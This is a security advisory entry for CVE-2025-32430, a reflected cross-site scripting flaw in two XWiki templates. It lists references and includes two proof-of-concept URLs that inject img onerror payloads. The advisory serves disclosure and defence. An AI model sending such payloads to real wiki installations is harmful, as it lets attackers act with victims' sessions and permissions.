CVE-2025-32430: XWiki allows Reflected XSS in two templates

August 5, 2025 (updated August 6, 2025)

Reflected XSS vulnerabilities in two templates allow an attacker to execute malicious JavaScript code in the context of the victim’s session by getting the victim to visit an attacker-controlled URL. PoC URLs are /xwiki/bin/view/Main/?xpage=job_status_json&jobId=asdf&translationPrefix=<img src=1 onerror=alert(document.domain)> and /xwiki/bin/view/Main/?xpage=distribution&extensionId=%3Cimg src=x onerror=alert(document.domain)%3E&extensionVersionConstraint=%3Cimg src=x onerror=alert(document.domain)%3E. This allows the attacker to perform arbitrary actions using the permissions of the victim.

References

github.com/advisories/GHSA-m9x4-w7p9-mxhx
github.com/xwiki/xwiki-platform
github.com/xwiki/xwiki-platform/commit/e5926a938cbecc8b1eaa48053d8d370cff107cb0
github.com/xwiki/xwiki-platform/security/advisories/GHSA-m9x4-w7p9-mxhx
jira.xwiki.org/browse/XWIKI-23096
nvd.nist.gov/vuln/detail/CVE-2025-32430

Code Behaviors & Features

Detect and mitigate CVE-2025-32430 with GitLab Dependency Scanning

Secure your software supply chain by verifying that all open source dependencies used in your projects contain no disclosed vulnerabilities. Learn more about Dependency Scanning →